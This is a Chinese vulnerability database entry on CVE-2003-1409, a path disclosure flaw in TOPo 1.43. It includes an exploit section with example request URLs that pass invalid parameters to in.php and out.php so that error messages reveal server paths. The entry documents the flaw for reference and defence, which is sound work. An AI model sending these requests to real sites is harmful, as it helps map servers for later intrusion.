TOPO远程路径泄露漏洞

TOPO远程路径泄露漏洞

漏洞ID 1107181 漏洞类型 信息泄露
发布时间 2003-02-04 更新时间 2003-12-31
图片[1]-TOPO远程路径泄露漏洞-安全小百科CVE编号 CVE-2003-1409
图片[2]-TOPO远程路径泄露漏洞-安全小百科CNNVD-ID CNNVD-200312-208
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22222
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-208
|漏洞详情
TOPo1.43版本存在漏洞。远程攻击者可以通过发送带有(1)in.php或(2)out.php无效参数的HTTP请求获取敏感信息,该漏洞可能在错误消息中泄露TOPo目录的路径。
|漏洞EXP
source: http://www.securityfocus.com/bid/6768/info

It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources.

http://www.example.com/[top_path]/in.php?
http://www.example.com/[top_path]/out.php?
http://www.example.com/[top_path]/in.php?id=any_word
http://www.example.com/[top_path]/out.php?id=any_word
http://www.example.com/[top_path]/in.php?any_word
http://www.example.com/[top_path]/out.php?any_word
|参考资料

来源:BUGTRAQ
名称:20030204TOPo1.43andprior-PathDisclosure(in.php,out.php)
链接:http://archives.neohapsis.com/archives/bugtraq/2003-02/0049.html
来源:XF
名称:topo-path-disclosure(11248)
链接:http://xforce.iss.net/xforce/xfdb/11248
来源:BID
名称:6768
链接:http://www.securityfocus.com/bid/6768
来源:SECUNIA
名称:8008
链接:http://secunia.com/advisories/8008

相关推荐: Netscape Java canConvert()缓冲区溢出漏洞

Netscape Java canConvert()缓冲区溢出漏洞 漏洞ID 1203437 漏洞类型 缓冲区溢出 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2248 CNNVD-ID CNNVD-20021…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享